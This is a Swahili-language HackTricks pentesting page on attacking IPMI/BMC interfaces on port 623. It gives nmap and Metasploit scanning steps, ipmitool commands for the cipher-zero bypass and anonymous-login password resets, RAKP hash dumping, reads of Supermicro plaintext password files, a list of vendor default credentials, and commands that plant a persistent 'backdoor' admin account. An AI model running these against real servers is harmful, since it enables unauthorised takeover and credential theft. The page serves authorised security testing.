10 KiB
623/UDP/TCP - IPMI
623/UDP/TCP - IPMI
Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (HackTricks AWS Red Team Expert)!
Njia nyingine za kusaidia HackTricks:
- Ikiwa unataka kuona kampuni yako ikionekana kwenye HackTricks au kupakua HackTricks kwa PDF Angalia MPANGO WA KUJIUNGA!
- Pata swag rasmi wa PEASS & HackTricks
- Gundua The PEASS Family, mkusanyiko wetu wa NFTs ya kipekee
- Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram au tufuate kwenye Twitter 🐦 @carlospolopm.
- Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa HackTricks na HackTricks Cloud github repos.
Taarifa Msingi
Muhtasari wa IPMI
Intelligent Platform Management Interface (IPMI) inatoa njia iliyostandardizwa ya usimamizi na ufuatiliaji wa mbali wa mifumo ya kompyuta, bila kujali mfumo wa uendeshaji au hali ya umeme. Teknolojia hii inaruhusu wasimamizi wa mfumo kusimamia mifumo kwa mbali, hata wakati zimezimwa au hazijibu, na ni muhimu hasa kwa:
- Mipangilio ya awali ya kuanza mfumo
- Usimamizi wa kuzima nguvu
- Kurejesha kutoka kwa kushindwa kwa mfumo
IPMI inaweza kufuatilia joto, voltage, kasi ya kifaa cha kupoza hewa, na ugavi wa umeme, pamoja na kutoa habari ya hesabu, kukagua magogo ya vifaa, na kutuma tahadhari kupitia SNMP. Kwa uendeshaji wake, inahitajika chanzo cha umeme na uhusiano wa LAN.
Tangu kuanzishwa kwake na Intel mnamo 1998, IPMI imeungwa mkono na wauzaji wengi, ikiboresha uwezo wa usimamizi wa mbali, haswa na msaada wa toleo la 2.0 kwa serial juu ya LAN. Sehemu muhimu ni pamoja na:
- Baseboard Management Controller (BMC): Kichapishi kikuu cha IPMI kwa shughuli.
- Mabasi na Viunganishi vya Mawasiliano: Kwa mawasiliano ya ndani na nje, ikiwa ni pamoja na ICMB, IPMB, na viunganishi mbalimbali kwa uhusiano wa ndani na wa mtandao.
- IPMI Memory: Kwa kuhifadhi magogo na data.
Bandari ya Default: 623/UDP/TCP (Kawaida inatumia UDP lakini inaweza pia kuendesha kwenye TCP)
Uchunguzi
Ugunduzi
nmap -n -p 623 10.0.0./24
nmap -n-sU -p 623 10.0.0./24
use auxiliary/scanner/ipmi/ipmi_version
Unaweza kutambua toleo kwa kutumia:
use auxiliary/scanner/ipmi/ipmi_version
nmap -sU --script ipmi-version -p 623 10.10.10.10
Mipasuko ya Usalama ya IPMI
Katika uwanja wa IPMI 2.0, kasoro kubwa ya usalama iligunduliwa na Dan Farmer, ikifichua kasoro kupitia aina ya kificho 0. Kasoro hii, iliyodhibitishwa kwa undani katika utafiti wa Dan Farmer, inawezesha ufikiaji usiohalali na nenosiri lolote linalotolewa ikiwa mtumiaji halali analengwa. Udhaifu huu uligunduliwa katika BMC mbalimbali kutoka kwa watengenezaji kama vile HP, Dell, na Supermicro, ikionyesha tatizo kubwa katika utekelezaji wa IPMI 2.0.
Kupitisha Uthibitishaji wa IPMI kupitia Kificho 0
Ili kugundua kasoro hii, skana ya ziada ya Metasploit ifuatayo inaweza kutumika:
use auxiliary/scanner/ipmi/ipmi_cipher_zero
Udanganyifu wa kasoro hii unaweza kufanikishwa kwa kutumia ipmitool
, kama inavyoonyeshwa hapa chini, kuruhusu orodha na marekebisho ya nywila za mtumiaji:
apt-get install ipmitool # Installation command
ipmitool -I lanplus -C 0 -H 10.0.0.22 -U root -P root user list # Lists users
ipmitool -I lanplus -C 0 -H 10.0.0.22 -U root -P root user set password 2 abc123 # Changes password
IPMI 2.0 RAKP Uthibitisho wa Mbali wa Kupata Hash ya Nenosiri la Mbali
Udhaifu huu unawezesha kupata nywila zilizohifadhiwa kwa chumvi (MD5 na SHA1) kwa jina lolote la mtumiaji lililopo. Ili kujaribu udhaifu huu, Metasploit inatoa moduli:
msf > use auxiliary/scanner/ipmi/ipmi_dumphashes
Uthibitishaji wa IPMI Usio na Kitambulisho
Usanidi wa chaguo-msingi katika BMC nyingi huruhusu ufikiaji "usio na kitambulisho", ambao unajulikana kwa kutokuwepo kwa majina ya mtumiaji na nywila. Usanidi huu unaweza kutumiwa kudukua upya nywila za akaunti za watumiaji walio na majina kwa kutumia ipmitool
:
ipmitool -I lanplus -H 10.0.0.97 -U '' -P '' user list
ipmitool -I lanplus -H 10.0.0.97 -U '' -P '' user set password 2 newpassword
Nenosiri za Wazi za Supermicro IPMI
Chaguo muhimu katika IPMI 2.0 inahitaji uhifadhi wa nywila za wazi ndani ya BMCs kwa madhumuni ya uwakilishi. Uhifadhi wa Supermicro wa nywila hizi katika maeneo kama vile /nv/PSBlock
au /nv/PSStore
unaleta wasiwasi mkubwa wa usalama:
cat /nv/PSBlock
Supermicro IPMI UPnP Vulnerability
Kujumuishwa kwa msikilizaji wa UPnP SSDP katika firmware ya IPMI ya Supermicro, haswa kwenye bandari ya UDP 1900, inaleta hatari kubwa ya usalama. Udhaifu katika Intel SDK kwa vifaa vya UPnP toleo 1.3.1, kama ilivyoelezwa na ufichuzi wa Rapid7, inaruhusu ufikiaji wa mizizi kwa BMC:
msf> use exploit/multi/upnp/libupnp_ssdp_overflow
Brute Force
HP inarandarandisha nenosiri la msingi kwa bidhaa yake ya Integrated Lights Out (iLO) wakati wa utengenezaji. Mazoea haya yanatofautiana na wazalishaji wengine, ambao kwa kawaida hutumia vitambulisho vya msingi vya tuli. Muhtasari wa majina ya mtumiaji na nywila za msingi kwa bidhaa mbalimbali ni kama ifuatavyo:
- HP Integrated Lights Out (iLO) hutumia herufi ndefu ya wahusika 8 iliyorandarandishwa kiwandani kama nywila yake ya msingi, ikionyesha kiwango cha juu cha usalama.
- Bidhaa kama Dell's iDRAC, IBM's IMM, na Fujitsu's Integrated Remote Management Controller hutumia nywila rahisi za kudhani kama "calvin", "PASSW0RD" (na sifuri), na "admin" mtawalia.
- Vivyo hivyo, Supermicro IPMI (2.0), Oracle/Sun ILOM, na ASUS iKVM BMC pia hutumia vitambulisho vya msingi rahisi, na "ADMIN", "changeme", na "admin" kama nywila zao.
Kupata Mwenyeji kupitia BMC
Upatikanaji wa kiutawala kwa Baseboard Management Controller (BMC) hufungua njia mbalimbali za kupata mfumo wa uendeshaji wa mwenyeji. Njia rahisi ni kuchexploitisha utendaji wa Keyboard, Video, Mouse (KVM) wa BMC. Hii inaweza kufanywa kwa kuzima upya mwenyeji hadi kwenye kabati la mizizi kupitia GRUB (kwa kutumia init=/bin/sh
) au kwa kuanza kutoka kwenye CD-ROM ya kisasa iliyowekwa kama diski ya uokoaji. Njia kama hizo zinaruhusu kuingiza mlango nyuma, kuchota data, au kufanya hatua zozote zinazohitajika kwa tathmini ya usalama. Hata hivyo, hii inahitaji kuzima upya mwenyeji, ambayo ni kikwazo kikubwa. Bila kuzima upya, kupata mwenyeji unaoendelea ni ngumu zaidi na inatofautiana na usanidi wa mwenyeji. Ikiwa konsoli ya kimwili au ya serial ya mwenyeji inabaki imeingia, inaweza kuchukuliwa kwa urahisi kupitia KVM ya BMC au utendaji wa serial-over-LAN (sol) kupitia ipmitool
. Uchunguzi wa utumiaji wa rasilimali za vifaa zilizoshirikiwa, kama vile basi la i2c na chip ya Super I/O, ni eneo ambalo linahitaji uchunguzi zaidi.
Kuweka Mlango Nyuma kwenye BMC kutoka kwa Mwenyeji
Baada ya kudukua mwenyeji ulio na BMC, kiolesura cha BMC cha ndani kinaweza kutumika kuweka mlango nyuma, kuunda uwepo wa kudumu kwenye seva. Shambulio hili linahitaji uwepo wa ipmitool
kwenye mwenyeji uliodukuliwa na kuwezeshwa kwa msaada wa dereva wa BMC. Amri zifuatazo zinaonyesha jinsi akaunti mpya ya mtumiaji inavyoweza kuingizwa kwenye BMC kwa kutumia kiolesura cha ndani cha mwenyeji, ambacho kinapuuza haja ya uwakilishi. Mbinu hii inatumika kwa anuwai ya mifumo ya uendeshaji ikiwa ni pamoja na Linux, Windows, BSD, na hata DOS.
ipmitool user list
ID Name Callin Link Auth IPMI Msg Channel Priv Limit
2 ADMIN true false false Unknown (0x00)
3 root true false false Unknown (0x00)
ipmitool user set name 4 backdoor
ipmitool user set password 4 backdoor
ipmitool user priv 4 4
ipmitool user list
ID Name Callin Link Auth IPMI Msg Channel Priv Limit
2 ADMIN true false false Unknown (0x00)
3 root true false false Unknown (0x00)
4 backdoor true false true ADMINISTRATOR
Shodan
port:623
Marejeo
Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!
Njia nyingine za kusaidia HackTricks:
- Ikiwa unataka kuona kampuni yako inatangazwa kwenye HackTricks au kupakua HackTricks kwa muundo wa PDF Angalia MPANGO WA KUJIUNGA!
- Pata swag rasmi ya PEASS & HackTricks
- Gundua The PEASS Family, mkusanyiko wetu wa NFTs ya kipekee
- Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram au tufuate kwenye Twitter 🐦 @carlospolopm.
- Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa HackTricks na HackTricks Cloud repos za github.